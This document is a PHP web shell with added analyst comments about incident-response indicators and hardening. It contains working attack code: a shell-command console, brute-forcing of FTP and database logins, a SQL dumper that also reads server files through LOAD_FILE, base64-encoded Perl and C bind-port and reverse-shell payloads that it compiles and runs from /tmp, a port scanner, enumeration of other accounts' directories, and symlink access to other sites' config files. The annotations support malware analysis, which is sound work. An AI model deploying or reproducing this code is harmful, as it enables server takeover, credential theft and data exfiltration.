echo ‘</select><input type=button onclick= »add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);} » value= »>> »> <input type=checkbox name=ajax value=1 ‘ . ($_SESSION[md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’] ? ‘checked’ : ») . ‘> send using AJAX<br/><textarea class=bigarea name=output style= »border-bottom:0; » readonly>’;
// Non-AJAX submission: the command runs during page rendering and its output is HTML-escaped.
if (!empty($_POST[‘p1’])) {
echo htmlspecialchars(« $ » . $_POST[‘p1’] . »
» . ex($_POST[‘p1’]));
}
echo ‘</textarea><input type=text name=cmd style= »border-top:0;width:100%; » onkeydown= »kp(event); »>’;
echo ‘</form></div><script>document.cf.cmd.focus();</script>’;
printFooter();
}
// actionLogout(): removes the session entry keyed by md5(Host header), which the login code earlier
// in the sample sets to true after a successful password check, then prints a page embedding a
// remotely hosted image. The image URL is a literal string of this sample and can be used as a
// content indicator when searching other files or proxy logs.
function actionLogout() {
unset($_SESSION[md5($_SERVER[‘HTTP_HOST’]) ]);
echo ‘<body bgcolor=#000000><center><img src= »http://www.itechcode.com/wp-content/uploads/2012/04/Secret-of-Blogging-Successfully.jpg »></center></body>’;
}
// actionSelfRemove(): "Suicide" panel. When $_POST['p1'] is 'yes' it unlink()s SELF_PATH, which the
// sample defines as __FILE__, so the shell deletes its own file and prints a confirmation.
// IR note: absence of the file at investigation time is therefore not evidence of a clean host;
// rely on access logs, backups and file-integrity baselines rather than on the file still existing.
function actionSelfRemove() {
printHeader();
if ($_POST[‘p1’] == ‘yes’) {
if (@unlink(SELF_PATH)) die(‘Shell has been removed’);
else echo ‘unlink error!’;
}
echo ‘<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick= »g(null,null,\’yes\’) »>Yes</a></div>’;
printFooter();
}
// actionBruteforce(): credential-guessing panel against FTP, MySQL or PostgreSQL.
// Inputs: $_POST['proto'] (ftp|mysql|pgsql); $_POST['server'] as host:port (form default 127.0.0.1);
// $_POST['type'] 1 = login names read from /etc/passwd, each tried with the login name itself as
// password and, when 'reverse' is set, with the reversed login name; 2 = the single login in
// $_POST['login'] tried against every line of the file named in $_POST['dict'].
// Detection: the attempts originate from the web server itself, so they show up in FTP and database
// authentication logs as a burst of failed logins from the local or web-server address. Matching
// pairs are printed in the page as login:password together with attempt and success counters.
function actionBruteforce() {
printHeader();
if (isset($_POST[‘proto’])) {
echo ‘<h1>Results</h1><div class=content><span>Type:</span> ‘ . htmlspecialchars($_POST[‘proto’]) . ‘ <span>Server:</span> ‘ . htmlspecialchars($_POST[‘server’]) . ‘<br>’;
// One bruteForce() definition is declared depending on the chosen protocol; each attempts a
// single login and returns the result of that attempt.
if ($_POST[‘proto’] == ‘ftp’) {
function bruteForce($ip, $port, $login, $pass) {
$fp = @ftp_connect($ip, $port ? $port : 21);
if (!$fp) return false;
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif ($_POST[‘proto’] == ‘mysql’) {
function bruteForce($ip, $port, $login, $pass) {
$res = @mysql_connect($ip . ‘:’ . $port ? $port : 3306, $login, $pass);
@mysql_close($res);
return $res;
}
} elseif ($_POST[‘proto’] == ‘pgsql’) {
function bruteForce($ip, $port, $login, $pass) {
$str = « host=' » . $ip . « ‘ port=' » . $port . « ‘ user=' » . $login . « ‘ password=' » . $pass . « ‘ dbname= » »;
$res = @pg_connect($server[0] . ‘:’ . $server[1] ? $server[1] : 5432, $login, $pass);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(« : », $_POST[‘server’]);
// Type 1: user names come from the first field of each /etc/passwd line.
if ($_POST[‘type’] == 1) {
$temp = @file(‘/etc/passwd’);
if (is_array($temp)) foreach ($temp as $line) {
$line = explode(« : », $line);
++$attempts;
if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) {
$success++;
echo ‘<b>’ . htmlspecialchars($line[0]) . ‘</b>:’ . htmlspecialchars($line[0]) . ‘<br>’;
}
if (@$_POST[‘reverse’]) {
$tmp = « »;
for ($i = strlen($line[0]) – 1;$i >= 0;–$i) $tmp.= $line[0][$i];
++$attempts;
if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) {
$success++;
echo ‘<b>’ . htmlspecialchars($line[0]) . ‘</b>:’ . htmlspecialchars($tmp);
}
}
}
// Type 2: dictionary file on the server's own disk, one candidate per line.
} elseif ($_POST[‘type’] == 2) {
$temp = @file($_POST[‘dict’]);
if (is_array($temp)) foreach ($temp as $line) {
$line = trim($line);
++$attempts;
if (bruteForce($server[0], @$server[1], $_POST[‘login’], $line)) {
$success++;
echo ‘<b>’ . htmlspecialchars($_POST[‘login’]) . ‘</b>:’ . htmlspecialchars($line) . ‘<br>’;
}
}
}
echo « <span>Attempts:</span> $attempts <span>Success:</span> $success</div><br> »;
}
// Input form; the dictionary field defaults to "passwd.dic" in the shell's current directory,
// a file name worth including in a sweep of the compromised tree.
echo ‘<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>’ . ‘<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>’ . ‘<input type=hidden name=c value= »‘ . htmlspecialchars($GLOBALS[‘cwd’]) . ‘ »>’ . ‘<input type=hidden name=a value= »‘ . htmlspecialchars($_POST[‘a’]) . ‘ »>’ . ‘<input type=hidden name=charset value= »‘ . htmlspecialchars($_POST[‘charset’]) . ‘ »>’ . ‘<span>Server:port</span></td>’ . ‘<td><input type=text name=server value= »127.0.0.1″></td></tr>’ . ‘<tr><td><span>Brute type</span></td>’ . ‘<td><label><input type=radio name=type value= »1″ checked> /etc/passwd</label></td></tr>’ . ‘<tr><td></td><td><label style= »padding-left:15px »><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>’ . ‘<tr><td></td><td><label><input type=radio name=type value= »2″> Dictionary</label></td></tr>’ . ‘<tr><td></td><td><table style= »padding-left:15px »><tr><td><span>Login</span></td>’ . ‘<td><input type=text name=login value= »root »></td></tr>’ . ‘<tr><td><span>Dictionary</span></td>’ . ‘<td><input type=text name=dict value= »‘ . htmlspecialchars($GLOBALS[‘cwd’]) . ‘passwd.dic »></td></tr></table>’ . ‘</td></tr><tr><td></td><td><input type=submit value= »>> »></td></tr></form></table>’;
echo ‘</div><br>’;
printFooter();
}
// actionSql(): database browser of the web shell (MySQL through the legacy mysql_* API,
// PostgreSQL through pg_*).
// Connection data comes from $_POST['sql_host'|'sql_login'|'sql_pass'|'sql_base'], the engine from
// $_POST['type'].
// Capabilities visible in this function: list databases and tables with row counts, page through
// a table 30 rows at a time, run the free-form statement in $_POST['p3'], dump the tables named in
// $_POST['tbl'] as INSERT statements into a gzip-compressed "dump.sql" download, and read server
// files through SELECT LOAD_FILE().
// Response notes: on a WordPress host the database credentials in wp-config.php are readable by the
// same account that runs this code, so they should be rotated after cleanup and the database
// contents treated as disclosed; withholding the FILE privilege from the application account
// limits the LOAD_FILE() path.
function actionSql() {
// DbClass: thin wrapper whose methods dispatch on $this->type ('mysql' or 'pgsql').
class DbClass {
// Engine name, connection handle and last result handle.
var $type;
var $link;
var $res;
function DbClass($type) {
$this->type = $type;
}
// Opens the connection; returns true on success, false otherwise.
function connect($host, $user, $pass, $dbname) {
switch ($this->type) {
case ‘mysql’:
if ($this->link = @mysql_connect($host, $user, $pass, true)) return true;
break;
case ‘pgsql’:
$host = explode(‘:’, $host);
if (!$host[1]) $host[1] = 5432;
if ($this->link = @pg_connect(« host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname »)) return true;
break;
}
return false;
}
// Selects the working database (MySQL branch only).
function selectdb($db) {
switch ($this->type) {
case ‘mysql’:
if (@mysql_select_db($db)) return true;
break;
}
return false;
}
// Runs a statement verbatim and keeps the result handle in $this->res.
function query($str) {
switch ($this->type) {
case ‘mysql’:
return $this->res = @mysql_query($str);
break;
case ‘pgsql’:
return $this->res = @pg_query($this->link, $str);
break;
}
return false;
}
// Returns the next row as an associative array, from the given result or from $this->res.
function fetch() {
$res = func_num_args() ? func_get_arg(0) : $this->res;
switch ($this->type) {
case ‘mysql’:
return @mysql_fetch_assoc($res);
break;
case ‘pgsql’:
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs() {
switch ($this->type) {
case ‘mysql’:
return $this->res = @mysql_list_dbs($this->link);
break;
case ‘pgsql’:
return $this->res = $this->query(« SELECT datname FROM pg_database »);
break;
}
return false;
}
function listTables() {
switch ($this->type) {
case ‘mysql’:
return $this->res = $this->query(‘SHOW TABLES’);
break;
case ‘pgsql’:
return $this->res = $this->query(« select table_name from information_schema.tables where (table_schema != ‘information_schema’ AND table_schema != ‘pg_catalog’) or table_name = ‘pg_user' »);
break;
}
return false;
}
// Last error text of the underlying driver.
function error() {
switch ($this->type) {
case ‘mysql’:
return @mysql_error($this->link);
break;
case ‘pgsql’:
return @pg_last_error($this->link);
break;
}
return false;
}
function setCharset($str) {
switch ($this->type) {
case ‘mysql’:
if (function_exists(‘mysql_set_charset’)) return @mysql_set_charset($str, $this->link);
else $this->query(‘SET CHARSET ‘ . $str);
break;
case ‘mysql’:
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
// Prints a table as SQL text: for MySQL the CREATE TABLE statement followed by one INSERT per
// row, for PostgreSQL the INSERT statements only. This is the bulk data-export path.
function dump($table) {
switch ($this->type) {
case ‘mysql’:
$res = $this->query(‘SHOW CREATE TABLE `’ . $table . ‘`’);
$create = mysql_fetch_array($res);
echo $create[1] . « ;
« ;
$this->query(‘SELECT * FROM `’ . $table . ‘`’);
while ($item = $this->fetch()) {
$columns = array();
foreach ($item as $k => $v) {
$item[$k] = « ‘ » . @mysql_real_escape_string($v) . « ‘ »;
$columns[] = « ` » . $k . « ` »;
}
echo ‘INSERT INTO `’ . $table . ‘` (‘ . implode(« , « , $columns) . ‘) VALUES (‘ . implode(« , « , $item) . ‘);’ . »
« ;
}
break;
case ‘pgsql’:
$this->query(‘SELECT * FROM ‘ . $table);
while ($item = $this->fetch()) {
$columns = array();
foreach ($item as $k => $v) {
$item[$k] = « ‘ » . addslashes($v) . « ‘ »;
$columns[] = $k;
}
echo ‘INSERT INTO ‘ . $table . ‘ (‘ . implode(« , « , $columns) . ‘) VALUES (‘ . implode(« , « , $item) . ‘);’ . »
« ;
}
break;
}
return false;
}
};
$db = new DbClass(@$_POST[‘type’]);
// Download mode: connect, dump every table listed in $_POST['tbl'] as an attachment, stop.
// A large compressed response to a POST on this file is what this looks like in web logs.
if (@$_POST[‘p2’] == ‘download’) {
ob_start(« ob_gzhandler », 4096);
$db->connect($_POST[‘sql_host’], $_POST[‘sql_login’], $_POST[‘sql_pass’], $_POST[‘sql_base’]);
$db->selectdb($_POST[‘sql_base’]);
header(« Content-Disposition: attachment; filename=dump.sql »);
header(« Content-Type: text/plain »);
foreach ($_POST[‘tbl’] as $v) $db->dump($v);
exit;
}
// Interactive mode: connection form first, prefilled with the posted values.
printHeader();
echo ‘<h1>Sql browser</h1><div class=content>
<form name= »sf » method= »post »>
<table cellpadding= »2″ cellspacing= »0″>
<tr>
<td>Type</td>
<td>Host</td>
<td>Login</td>
<td>Password</td>
<td>Database</td>
<td></td>
</tr>
<tr>
<input type=hidden name=a value=Sql>
<input type=hidden name=p1 value=\’query\’>
<input type=hidden name=p2>
<input type=hidden name=c value= »‘ . htmlspecialchars($GLOBALS[‘cwd’]) . ‘ »>
<input type=hidden name=charset value= »‘ . (isset($_POST[‘charset’]) ? $_POST[‘charset’] : ») . ‘ »>
<td>
<select name=\’type\’>
<option value= »mysql » ‘ . (@$_POST[‘type’] == ‘mysql’ ? ‘selected’ : ») . ‘>MySql</option>
<option value= »pgsql » ‘ . (@$_POST[‘type’] == ‘pgsql’ ? ‘selected’ : ») . ‘>PostgreSql</option>
</select></td>
<td><input type=text name=sql_host value= »‘ . (empty($_POST[‘sql_host’]) ? ‘localhost’ : htmlspecialchars($_POST[‘sql_host’])) . ‘ »></td>
<td><input type=text name=sql_login value= »‘ . (empty($_POST[‘sql_login’]) ? ‘root’ : htmlspecialchars($_POST[‘sql_login’])) . ‘ »></td>
<td><input type=text name=sql_pass value= »‘ . (empty($_POST[‘sql_pass’]) ? » : htmlspecialchars($_POST[‘sql_pass’])) . ‘ »></td>
<td>’;
$tmp = « <input type=text name=sql_base value= »> »;
// On a successful connection the panel charset is mapped to a database charset and the
// database list replaces the free-text database field.
if (isset($_POST[‘sql_host’])) {
if ($db->connect($_POST[‘sql_host’], $_POST[‘sql_login’], $_POST[‘sql_pass’], $_POST[‘sql_base’])) {
switch ($_POST[‘charset’]) {
case « Windows-1251 »:
$db->setCharset(‘cp1251’);
break;
case « UTF-8 »:
$db->setCharset(‘utf8’);
break;
case « KOI8-R »:
$db->setCharset(‘koi8r’);
break;
case « KOI8-U »:
$db->setCharset(‘koi8u’);
break;
case « cp866 »:
$db->setCharset(‘cp866’);
break;
}
$db->listDbs();
echo « <select name=sql_base><option value= »></option> »;
while ($item = $db->fetch()) {
list($key, $value) = each($item);
echo ‘<option value= »‘ . $value . ‘ » ‘ . ($value == $_POST[‘sql_base’] ? ‘selected’ : ») . ‘>’ . $value . ‘</option>’;
}
echo ‘</select>’;
} else echo $tmp;
} else echo $tmp;
echo ‘</td>
<td><input type=submit value= »>> »></td>
</tr>
</table>
<script>
function st(t,l) {
document.sf.p1.value = \’select\’;
document.sf.p2.value = t;
if(l!=null)document.sf.p3.value = l;
document.sf.submit();
}
function is() {
for(i=0;i<document.sf.elements[\’tbl[]\’].length;++i)
document.sf.elements[\’tbl[]\’][i].checked = !document.sf.elements[\’tbl[]\’][i].checked;
}
</script>’;
if (isset($db) && $db->link) {
echo « <br/><table width=100% cellpadding=2 cellspacing=0> »;
if (!empty($_POST[‘sql_base’])) {
$db->selectdb($_POST[‘sql_base’]);
echo « <tr><td width=1 style=’border-top:2px solid #666;border-right:2px solid #666;’><span>Tables:</span><br><br> »;
// Table list: one COUNT(*) query per table, so opening this view produces a burst of
// count queries across every table of the selected database.
$tbls_res = $db->listTables();
while ($item = $db->fetch($tbls_res)) {
list($key, $value) = each($item);
$n = $db->fetch($db->query(‘SELECT COUNT(*) as n FROM ‘ . $value . »));
$value = htmlspecialchars($value);
echo « <nobr><input type=’checkbox’ name=’tbl[]’ value=' » . $value . « ‘> <a href=# onclick=\ »st(‘ » . $value . « ‘)\ »> » . $value . « </a> ( » . $n[‘n’] . « )</nobr><br> »;
}
echo « <input type=’checkbox’ onclick=’is();’> <input type=button value=’Dump’ onclick=’document.sf.p2.value=\ »download\ »;document.sf.submit();’></td><td style=’border-top:2px solid #666;’> »;
// 'select': p2 = table name, p3 = page index; rewritten into a paged SELECT and then handled
// by the 'query' branch below.
if (@$_POST[‘p1’] == ‘select’) {
$_POST[‘p1’] = ‘query’;
$db->query(‘SELECT COUNT(*) as n FROM ‘ . $_POST[‘p2’] . »);
$num = $db->fetch();
$num = $num[‘n’];
echo « <span> » . $_POST[‘p2’] . « </span> ($num) « ;
for ($i = 0;$i < ($num / 30);$i++) if ($i != (int)$_POST[‘p3′]) echo « <a href=’#’ onclick=’st(\ » » . $_POST[‘p2′] . « \ », $i)’> », ($i + 1), « </a> « ;
else echo ($i + 1), » « ;
if ($_POST[‘type’] == ‘pgsql’) $_POST[‘p3’] = ‘SELECT * FROM ‘ . $_POST[‘p2’] . ‘ LIMIT 30 OFFSET ‘ . ($_POST[‘p3’] * 30);
else $_POST[‘p3’] = ‘SELECT * FROM `’ . $_POST[‘p2’] . ‘` LIMIT ‘ . ($_POST[‘p3’] * 30) . ‘,30’;
echo « <br><br> »;
}
// 'query': executes the statement in p3 as given and renders the rows as an HTML table.
if ((@$_POST[‘p1’] == ‘query’) && !empty($_POST[‘p3’])) {
$db->query(@$_POST[‘p3’]);
if ($db->res !== false) {
$title = false;
echo ‘<table width=100% cellspacing=0 cellpadding=2 class=main>’;
$line = 1;
while ($item = $db->fetch()) {
if (!$title) {
echo ‘<tr>’;
foreach ($item as $key => $value) echo ‘<th>’ . $key . ‘</th>’;
reset($item);
$title = true;
echo ‘</tr><tr>’;
$line = 2;
}
echo ‘<tr class= »l’ . $line . ‘ »>’;
$line = $line == 1 ? 2 : 1;
foreach ($item as $key => $value) {
if ($value == null) echo ‘<td><i>null</i></td>’;
else echo ‘<td>’ . nl2br(htmlspecialchars($value)) . ‘</td>’;
}
echo ‘</tr>’;
}
echo ‘</table>’;
} else {
echo ‘<div><b>Error:</b> ‘ . htmlspecialchars($db->error()) . ‘</div>’;
}
}
echo « <br><textarea name=’p3′ style=’width:100%;height:100px’> » . @htmlspecialchars($_POST[‘p3′]) . « </textarea><br/><input type=submit value=’Execute’> »;
echo « </td></tr> »;
}
echo « </table></form><br/><form onsubmit=’document.sf.p1.value=\ »loadfile\ »;document.sf.p2.value=this.f.value;document.sf.submit();return false;’><span>Load file</span> <input class=’toolsInp’ type=text name=f><input type=submit value=’>>’></form> »;
// 'loadfile': reads a file with the database server's own privileges through LOAD_FILE(),
// which is why the FILE privilege of the application account matters.
if (@$_POST[‘p1’] == ‘loadfile’) {
$db->query(« SELECT LOAD_FILE(‘ » . addslashes($_POST[‘p2’]) . « ‘) as file »);
$file = $db->fetch();
echo ‘<pre class=ml1>’ . htmlspecialchars($file[‘file’]) . ‘</pre>’;
}
}
echo ‘</div>’;
printFooter();
}
function actionNetwork() {
printHeader();
$back_connect_c = « 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 »;
$back_connect_p = « IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7 »;
$bind_port_c = « I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9 »;
$bind_port_p = « IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0= »;
echo ‘<h1>Network tools</h1><div class=content>
<form name=\’nfp\’ onSubmit= »g(null,null,this.using.value,this.port.value,this.pass.value);return false; »>
<br /><span>Bind port to /bin/sh</span><br/>
Port: <input type=\’text\’ name=\’port\’ value=\’443\’> Password: <input type=\’text\’ name=\’pass\’ value=\’Dr.web\’> Using: <select name= »using »><option value=\’bpc\’>C</option><option value=\’bpp\’>Perl</option></select> <input type=submit value= »>> »>
</form>
<form name=\’nfp\’ onSubmit= »g(null,null,this.using.value,this.server.value,this.port.value);return false; »>
<br /><br /><span>Back-connect to</span><br/>
Server: <input type=\’text\’ name=\’server\’ value= »‘ . $_SERVER[‘REMOTE_ADDR’] . ‘ »> Port: <input type=\’text\’ name=\’port\’ value=\’443\’> Using: <select name= »using »><option value=\’bcc\’>C</option><option value=\’bcp\’>Perl</option></select> <input type=submit value= »>> »>
</form><br>’;
if (isset($_POST[‘p1’])) {
function cf($f, $t) {
$w = @fopen($f, « w ») or @function_exists(‘file_put_contents’);
if ($w) {
@fwrite($w, base64_decode($t)) or @fputs($w, base64_decode($t)) or @file_put_contents($f, base64_decode($t));
@fclose($w);
}
}
if ($_POST[‘p1’] == ‘bpc’) {
cf(« /tmp/bp.c », $bind_port_c);
$out = ex(« gcc -o /tmp/bp /tmp/bp.c »);
@unlink(« /tmp/bp.c »);
$out.= ex(« /tmp/bp » . $_POST[‘p2’] . » » . $_POST[‘p3’] . » & »);
echo « <pre class=ml1>$out
» . ex(« ps aux | grep bp ») . « </pre> »;
}
if ($_POST[‘p1’] == ‘bpp’) {
cf(« /tmp/bp.pl », $bind_port_p);
$out = ex(which(« perl ») . » /tmp/bp.pl » . $_POST[‘p2’] . » & »);
echo « <pre class=ml1>$out
» . ex(« ps aux | grep bp.pl ») . « </pre> »;
}
if ($_POST[‘p1’] == ‘bcc’) {
cf(« /tmp/bc.c », $back_connect_c);
$out = ex(« gcc -o /tmp/bc /tmp/bc.c »);
@unlink(« /tmp/bc.c »);
$out.= ex(« /tmp/bc » . $_POST[‘p2’] . » » . $_POST[‘p3’] . » & »);
echo « <pre class=ml1>$out
» . ex(« ps aux | grep bc ») . « </pre> »;
}
if ($_POST[‘p1’] == ‘bcp’) {
cf(« /tmp/bc.pl », $back_connect_p);
$out = ex(which(« perl ») . » /tmp/bc.pl » . $_POST[‘p2’] . » » . $_POST[‘p3’] . » & »);
echo « <pre class=ml1>$out
» . ex(« ps aux | grep bc.pl ») . « </pre> »;
}
}
echo ‘</div>’;
printFooter();
}
// actionPortScanner(): TCP connect scan run from the web server.
// With $_POST['host'] set and numeric 'start' / 'end', it calls fsockopen() on every port of the
// range with a 3 second timeout and prints the ports that accepted the connection; otherwise it
// shows the input form (defaults: localhost, ports 0 to 5000).
// Detection and mitigation: a run of sequential connection attempts from the PHP process to one
// host, including loopback services that are not exposed externally; egress filtering for the
// web-server account and disabling fsockopen() where it is not needed reduce what it can reach.
function actionPortScanner() {
printHeader();
echo ‘<h1>Port Scanner</h1>’;
echo ‘<div class= »content »>’;
echo ‘<form action= » » method= »post »>’;
if (isset($_POST[‘host’]) && is_numeric($_POST[‘end’]) && is_numeric($_POST[‘start’])) {
$start = strip_tags($_POST[‘start’]);
$end = strip_tags($_POST[‘end’]);
$host = strip_tags($_POST[‘host’]);
// One connection attempt per port; only successes are reported, and output is flushed per port.
for ($i = $start;$i <= $end;$i++) {
$fp = @fsockopen($host, $i, $errno, $errstr, 3);
if ($fp) {
echo ‘Port ‘ . $i . ‘ is <font color=green>open</font><br>’;
}
flush();
}
} else {
echo ‘<br /><br /><center><input type= »hidden » name= »a » value= »PortScanner »><input type= »hidden » name=p1><input type= »hidden » name= »p2″>
<input type= »hidden » name= »c » value= »‘ . htmlspecialchars($GLOBALS[‘cwd’]) . ‘ »>
<input type= »hidden » name= »charset » value= »‘ . (isset($_POST[‘charset’]) ? $_POST[‘charset’] : ») . ‘ »>
Host: <input type= »text » name= »host » value= »localhost »/><br /><br />
Port start: <input type= »text » name= »start » value= »0″/><br /><br />
Port end:<input type= »text » name= »end » value= »5000″/><br /><br />
<input type= »submit » value= »Scan Ports » />
</form></center><br /><br />’;
}
echo ‘</div>’;
printFooter();
}
// actionReadable(): enumerates other accounts' web roots on a shared host.
// Reads /etc/passwd, skips its first 36 lines, and for each remaining user name tests whether
// /home/<user>/public_html/ is readable by the current process; the readable paths are listed.
// Does nothing but print an error when the safe_mode ini value is on.
// Mitigation pointer: per-account isolation (home directories not readable by other users,
// per-site PHP pools or open_basedir) is what keeps one compromised site from exposing its neighbours.
function actionReadable() {
printHeader();
echo ‘<h1>Readable Dirs</h1>’;
echo ‘<div class= »content »>’;
$sm = ini_get(‘safe_mode’);
if ($sm) {
echo ‘<br /><b>Error: safe_mode = on</b><br /><br />’;
} else {
@$passwd = fopen(‘/etc/passwd’, ‘r’);
if (!$passwd) {
echo ‘<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />’;
} else {
$pub = array();
$users = array();
$conf = array();
$i = 0;
while (!feof($passwd)) {
$str = fgets($passwd);
// Lines with index 0..35 are skipped; the user name is the text before the first ':'.
if ($i > 35) {
$pos = strpos($str, ‘:’);
$username = substr($str, 0, $pos);
$dirz = ‘/home/’ . $username . ‘/public_html/’;
if (($username != »)) {
if (is_readable($dirz)) {
array_push($users, $username);
array_push($pub, $dirz);
}
}
}
$i++;
}
echo ‘<br><br>’;
echo « [+] Founded » . sizeof($users) . » entrys in /etc/passwd
» . « <br /> »;
echo « [+] Founded » . sizeof($pub) . » readable public_html directories
» . « <br /><br /><br /> »;
foreach ($users as $user) {
$path = « /home/$user/public_html/ »;
echo $path . « <br> »;
}
echo « <br /><br /><br />[+] Complete…
» . « <br /> »;
}
}
echo ‘</div>’;
printFooter();
}
// Analyst note: cross-account file access on shared hosting, selected by POST 'p1':
//   'website' - lists the zones found in /etc/named.conf with the owning account
//   'whole'   - creates ./sym, writes sym/.htaccess and links sym/root to '/'
//   'config'  - same setup, then probes well-known CMS config paths through the link
// Disk artefacts to hunt for (paths are relative to the script's working directory):
// a 'sym' directory created with mode 0777, 'sym/.htaccess' holding the directives
// below, and a 'sym/root' symlink pointing at '/'.
// Hardening that defeats this pattern is normally server-side: SymLinksIfOwnerMatch
// rather than FollowSymLinks, and an AllowOverride policy that does not let a site's
// .htaccess change Options or handlers. Verify against the host's configuration.
// eregi() was removed in PHP 7.0, so the zone parsing below only works on older PHP.
function actionSymlink() {
printHeader();
echo ‘<h1>Symlink</h1>’;
// Base URL of the shell itself, rebuilt from request data; used by the 'config' probes.
$furl = ‘http://’ . $_SERVER[‘SERVER_NAME’] . $_SERVER[‘REQUEST_URI’];
$expld = explode(‘/’, $furl);
$burl = str_replace(end($expld), », $furl);
echo ‘<div class= »content »><center>
<h3>[ <a href= »# » onclick= »g(\’symlink\’,null,\’website\’,null) »>Domains</a> ] –
[ <a href= »# » onclick= »g(\’symlink\’,null,\’whole\’,null) »>Whole Server Symlink</a> ] –
[ <a href= »# » onclick= »g(\’symlink\’,null,\’config\’,null) »>Config files symlink</a> ]</h3></center>’;
// Mode 'website': read-only inventory of hosted domains and their owners.
if (isset($_POST[‘p1’]) && $_POST[‘p1’] == ‘website’) {
echo « <center> »;
$d0mains = @file(« /etc/named.conf »);
if (!$d0mains) {
echo « <pre class=ml1 style=’margin-top:5px’>Cant access this file on server -> [ /etc/named.conf ]</pre></center> »;
} else {
echo « <table align=center class=’main’ border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr> »;
$unk = array();
